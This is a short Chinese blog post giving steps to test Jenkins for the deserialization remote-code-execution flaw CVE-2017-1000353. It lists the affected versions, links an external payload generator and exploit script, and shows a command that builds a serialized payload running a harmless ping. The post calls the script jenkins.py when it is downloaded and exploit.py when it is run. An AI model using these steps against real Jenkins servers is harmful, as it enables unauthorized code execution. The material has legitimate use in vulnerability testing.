Jenkins远程代码执行漏洞检查(CVE-2017-1000353)
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限
漏洞影响范围:
所有Jenkins主版本均受到影响(包括<=2.56版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
测试步骤:
1.下载生成反序列的payload:
https://github.com/nobleXu/jenkins
2.生成一个jenkins_poc1.ser反序列文件
java -jar jenkins_payload.jar jenkins_poc1.ser "ping www.baidu.com"
3.下载jenkins.py文件:
下载链接: https://pan.baidu.com/s/1misPilU 密码: 6qqh
4.编辑jenkins.py文件,修改url地址:
5.执行jenkins.py:
python3 exploit.py
6.通过dnslog可以看到反序列请求日志记录:
测试总结:
Jenkins运行环境是在linux下,win环境利用不成功
参考文献:
https://github.com/phith0n/vulhub/tree/master/jenkins/CVE-2017-1000353
https://blogs.securiteam.com/index.php/archives/3171
https://xianzhi.aliyun.com/forum/read/1567.html
分类:
web渗透
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构